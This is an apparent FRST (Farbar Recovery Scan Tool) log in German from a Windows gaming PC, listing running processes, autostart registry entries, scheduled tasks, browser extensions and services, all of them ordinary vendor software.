-> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe (services.exe ->) (NortonLifeLock Inc. -> NortonLifelock Inc.) 
C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe <2> (services.exe ->) (NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3> (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe (services.exe ->) (Samsung Electronics CO., LTD. -> ) C:\Program Files\Samsung\Easy Connection to Screen\Service.exe (services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe (sihost.exe ->) (6099D0EF-9374-47ED-BDFE-A82136831235 -> File-New-Project) C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne\EarTrumpet\EarTrumpet.exe (svchost.exe ->) (Brave Software, Inc. -> BraveSoftware Inc.) 
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe <2> (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileCoAuth.exe (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\WidgetService.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\LocationNotificationWindows.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe <2> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\Packages\Preview\amd64\MoUsoCoreWorker.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> ) C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI.TerminalServer.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) 
C:\Program Files (x86)\MSI\MSI Center\Speed Up\StorageMonitor.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\True Color\New\MSI.True Color.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Engine.exe ==================== Registry (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe [1945544 2024-02-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM-x32\...\Run: [MSIRegister] => C:\Program Files (x86)\MSI\MSIRegister\MSIRegister.exe [1266864 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4407656 2024-07-17] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Stable] => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1832968 2024-07-23] (Overwolf Ltd -> Overwolf Ltd.) 
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [37550568 2024-06-21] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Discord] => C:\ProgramData\skysc\Discord\Update.exe [1525024 2023-11-06] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Lunar Client] => C:\Users\skysc\AppData\Local\Programs\launcher\Lunar Client.exe [176849464 2024-07-22] (Moonsworth, LLC -> Moonsworth LLC)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [MicrosoftEdgeAutoLaunch_B751ED54CA5804D0129CEDA4AA0FE63C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\127.0.6533.72\Installer\chrmstp.exe [2024-07-24] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\Installer\chrmstp.exe [2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {31A29B33-2F9D-4E5A-B113-C2F9AE0A2F8D} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {FFF40F90-C4A9-480F-AF6F-95D6FE70C03E} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {8FE0E829-5739-4830-B8A4-8EADE5477709} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem128.0.6597.0{08699C9D-C6E5-410E-854E-9120298296B0} => C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe [4889704 2024-07-15] (Google LLC -> Google LLC)
Task: {C4F8F6AF-D8BB-46EB-BA88-43F5FDF7B4B3} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {506BA0A8-DADC-4595-B0DA-A7691B71C178} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {4EE6DC46-FA2C-42D4-A227-D1C2A6DDD040} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {56EC0CC9-972B-4DAD-9FA5-3B9402190B3A} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {28ABD9F2-6737-46AD-8E0C-DDC433A2E213} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EF0A3A8E-574C-4DCB-BFF6-6812FDD96FDA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BF3E2465-DBAF-44DE-9296-EBE42160D27D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EEBEA335-5213-497F-BC43-9876DE8688BC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B0F24A60-5E79-4210-B730-A2F79708048A} - System32\Tasks\MSI Task Host - LEDKeeper2_Host => C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe [2676840 2023-12-14] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
Task: {357123E4-3248-405C-B227-A69F3326D479} - System32\Tasks\MSI Task Host - MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe [81208 2021-09-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {AC26D83B-FCAF-453F-95DE-FE3F8465C2AA} - System32\Tasks\MSI Task Host - TraceFPS => C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe [2780144 2021-01-25] (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.)
Task: {BE288D1C-D22E-4A65-B6A3-CE0B3052224E} - System32\Tasks\MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe [119392 2023-08-07] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {1C40815B-A056-4AC2-A931-091E03CB0218} - System32\Tasks\MSI_Toast_Server => C:\Program Files (x86)\MSI\MSI Toast Server\MSIToastServer.exe [31904 2019-03-05] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
Task: {A45A8499-F30D-4F3E-B660-CB9196513923} - System32\Tasks\Norton 360\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {CA54FDB8-6128-47BD-A0ED-C9D0BBDC5708} - System32\Tasks\Norton 360\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {85460D07-DD81-48AC-9DB8-FAEDDD9E4A9C} - System32\Tasks\Norton 360\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {0700D5B1-102A-4893-9ADA-7185056261A3} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.24.2.6\WSCStub.exe [646520 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {215D98A3-22CF-401A-B072-0FE3E4252469} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1005096 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files\NVIDIA Corporation\NvContainer\-d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {CB09D936-04C5-49C6-91A5-CD343A8088D7} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3345448 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6046E66B-556D-4BB5-96D7-FDFB29791D41} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649256 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files (x86)\NVIDIA Corporation\NvNode\--launcher=TaskScheduler
Task: {95330FA2-42F5-4B9D-BCDD-CC2BC8E9858B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EFCC5B6E-BB1B-4CFD-B824-89EA3F22A919} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EFDA8A96-B078-491E-9E03-8E76DE56ABD2} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B0B1CF3B-E160-45F4-8767-2446FF93B44B} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B43D8D56-45EB-4D1E-91B8-63CF957E1173} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {833377F9-8375-488D-9096-CF4605EB48C5} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {15469283-290A-4C91-A80D-973776316BD4} - System32\Tasks\OneDrive Per-Machine Standalone Update Task => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {54E56090-CE3D-4B15-A9F5-A7DA596CFE18} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1000 => C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting (Keine Datei)
Task: {3246FB24-FF9D-4B54-95BD-653EE03503A7} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {46979F62-4655-4018-955E-9BF1D88DDF97} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {64E3E2E2-E8DF-4744-BD6F-EF5E97162EE2} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1693322873 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {CF648919-4154-44DE-BFE9-9DF87ED8EC9C} - System32\Tasks\Opera GX scheduled Autoupdate 1691520674 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software)
Task: {EBAC0C4B-4BF7-483A-BD3B-1E4EB3E0E848} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2370056 2024-07-23] (Overwolf Ltd -> Overwolf LTD) -> C:\Program Files (x86)\Overwolf\/RunningFrom Schedule
Task: {8306D461-C0F2-4929-9968-4BDBDFF98E88} - System32\Tasks\PowerToys\Autorun for skysc => C:\Program Files\PowerToys\PowerToys.exe [1194016 2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
Task: {EDA296B7-700B-44AF-82EC-5530F81BED52} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton 360 for Gamers\Upgrade.exe [2353000 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpDomain] Speedport_W_724V_09011603_06_010

Edge:
=======
Edge DefaultProfile: Profile 1
Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default [2024-07-19]
Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19]
Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19]
Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2024-07-24]
Edge HomePage: Profile 1 -> hxxp://www.google.com/
Edge DefaultSearchURL: Profile 1 -> hxxps://www.bing.com/search?PC=U523&q={searchTerms}
Edge Extension: (Microsoft Rewards) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\bnplfnhcidhhdapmblniehfaaompjlck [2024-07-19]
Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19]
Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19]

FireFox:
========
FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.20 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default [2024-07-24]
CHR Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-05-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2024-07-24]

Opera:
=======
StartMenuInternet: (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001) Opera GXStable - "C:\Users\skysc\AppData\Local\Programs\Opera GX\Launcher.exe"

Brave:
=======
BRA Profile: C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2024-07-23]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block First Party Filters (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\adcocjohghhfpidemphmcmlmhnfgikei [2024-07-20]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2024-07-20]
BRA Extension: (Brave NTP background images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2024-04-14]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bbefpembgddgdihpkcidgdgiojjlchji [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Fanboy's Mobile Notifications (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bfpgedeaaibpoidldhjcknekahbikncb [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Cookie (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\cdbbhgbmjhfnhnmgeddbliobbofkgdhe [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Regional Catalog)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\gkboaolpopklhgplhaaiboijnklogmbc [2024-07-20]
BRA Extension: (Brave NTP Super Referrer mapping table) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\heplpbhjcbmiibdlchlanmdenffpiibo [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block Updater (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\iodkpdagapdfkphljnddpjlldadblomo [2024-07-20]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\jcncoheihebhhiemmbmpfhkceomfipbj [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Germany (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\lfmefmifdjlfneapckmpkinmlofjehbp [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Resources)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\mfddibmblmbccpadfndgakiopmmhebop [2024-07-20]
BRA Extension: (Brave NTP sponsored images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\obbokncgfcbepeipkhpdepjjoncelefj [2024-07-20]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [15772456 2023-12-03] (BattlEye Innovations e.K. -> )
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 BraveElevationService; C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\elevation_service.exe [2688024 2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11988424 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
S3 ComboCleaner.Guard; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.Guard.exe [144616 2024-06-04] (RCS LT UAB -> RCS LT)
S3 ComboCleaner.WinService; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.WinService.exe [152296 2024-06-04] (RCS LT UAB -> RCS LT)
R2 Easy Connection to Screen; C:\Program Files\Samsung\Easy Connection to Screen\Service.exe [367816 2023-01-13] (Samsung Electronics CO., LTD. -> )
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [955816 2023-10-01] (EasyAntiCheat Oy -> Epic Games, Inc.)
